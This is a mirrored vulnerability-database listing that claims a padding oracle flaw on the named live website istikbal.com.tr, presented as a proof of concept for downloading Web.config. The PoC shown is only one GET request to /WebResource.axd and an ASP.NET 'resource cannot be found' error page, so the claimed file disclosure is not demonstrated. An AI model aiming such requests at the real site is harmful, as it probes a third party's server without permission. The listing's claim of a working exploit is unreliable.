istikbal Padding Oracle Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1856566 漏洞类型
发布时间 2019-12-11 更新时间 2019-12-11
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019120052
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Exploit Title:istikbal Padding Oracle Vulnerability 
# Date:10.12.2019
# Exploit Author: Furkan Özer // Prototyqe
# Vendor Homepage: istikbal.com.tr
# Version: ALL 
# Tested on: Windows 10-Linux Kali


***************************************************************************************************
This proof-of-concept exploit performs a Padding Oracle attack against a simple ASP.NET application (it can be any application) to download a file from the remote Web Server. In this example the proof-of-concept exploit downloads the Web.config file.

GET /WebResource.axd HTTP/1.1
Cookie: ASP.NET_SessionId=rsdw2kouuyhy2odwcpy1vi35
Host: www.istikbal.com.tr
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

poc 


<!DOCTYPE html>
<html>
    <head>
        <title>The resource cannot be found.</title>

           ****** <b> Requested URL: </b>/WebResource.axd<br><br>*********

            <hr width=100% size=1 color=silver>

            <b>Version Information:</b> Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3062.0

            </font>